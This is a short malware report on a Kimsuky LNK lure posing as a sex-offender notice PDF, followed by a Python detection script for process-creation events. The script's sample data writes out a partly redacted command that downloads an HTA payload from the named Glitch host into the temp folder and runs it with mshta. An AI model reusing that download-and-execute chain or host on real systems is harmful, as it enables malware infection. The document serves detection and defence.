Kimsuky malware disguised as a sex offender personal information disclosure form: 성범죄자 신상정보 고지.pdf.lnk (2025.3.25)

2025-03-28 Sakai Kimsuky malware disguised as a sex offender information notice PDF LNK, March 25 2025

https://wezard4u.tistory.com/429442


The report analyzes a Kimsuky-attributed LNK lure named like a sex offender information notice PDF. Execution runs cmd.exe from the shortcut context, changes into the user temporary directory, downloads sfmw.hta from cdn.glitch.global, and launches it with mshta, creating a lightweight script-based infection chain. The report lists hashes for the LNK, including SHA-256 a66c25b1f0dea6e06a4c9f8c5f6ebba0f6c21bd3b9cc326a56702db30418f189, and highlights use of common Windows binaries and writable user paths to reduce friction. Defenders should monitor mshta launches from LNK files, downloads into %TEMP%, and access to the cited Glitch-hosted HTA payload.
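The monitoring advice above can be expressed as a check over process-creation telemetry. The following is an added example, not code from the report: it assumes events shaped like Sysmon Event ID 1 records (`Image`, `ParentImage`, `CommandLine`, `CurrentDirectory`), and all sample events, the URL path and the `<download-tool>` token are constructed placeholders.

```python
import re

# Field names follow Sysmon Event ID 1 (process creation). Every event below
# is a constructed sample; the URL path and "<download-tool>" are placeholders,
# since the page gives neither the full URL nor the download command.
TEMP_RE = re.compile(r"%temp%|\\appdata\\local\\temp", re.I)
URL_HOST_RE = re.compile(r"https?://([\w.-]+)", re.I)
HTA_RE = re.compile(r"\.hta\b", re.I)
WATCHED_HOSTS = {"cdn.glitch.global"}  # payload host named in the report


def exe(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def reasons_for(ev):
    """Return the reasons a process-creation event matches the described chain."""
    image, parent, cmdline = exe(ev["Image"]), exe(ev["ParentImage"]), ev["CommandLine"]
    found = []
    if image == "cmd.exe" and parent == "explorer.exe":
        # Assumption: a double-clicked shortcut starts its target under explorer.exe.
        hosts = {h.lower() for h in URL_HOST_RE.findall(cmdline)}
        if hosts and TEMP_RE.search(cmdline):
            found.append("download-into-temp")
        if "mshta" in cmdline.lower() and HTA_RE.search(cmdline):
            found.append("cmd-launches-mshta")
        if hosts & WATCHED_HOSTS:
            found.append("watched-host")
    elif image == "mshta.exe" and parent == "cmd.exe" and HTA_RE.search(cmdline):
        # After "cd" the HTA is referenced by a relative name, so the temp path
        # only shows up in CurrentDirectory, not in the command line.
        where = "in-temp" if TEMP_RE.search(ev.get("CurrentDirectory", "")) else "elsewhere"
        found.append("mshta-hta-" + where)
    return found


SAMPLE_EVENTS = [  # constructed
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CurrentDirectory": r"C:\Users\user\Desktop",
     "CommandLine": "cmd.exe /c cd /d %temp% && <download-tool> "
                    "https://cdn.glitch.global/EXAMPLE/sfmw.hta && mshta sfmw.hta"},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CurrentDirectory": r"C:\Users\user\AppData\Local\Temp",
     "CommandLine": "mshta sfmw.hta"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CurrentDirectory": r"C:\Users\user", "CommandLine": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(exe(ev["Image"]), reasons_for(ev))
```

The second sample shows why `CurrentDirectory` matters: once the shell has changed directory, the mshta command line carries only a relative file name.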
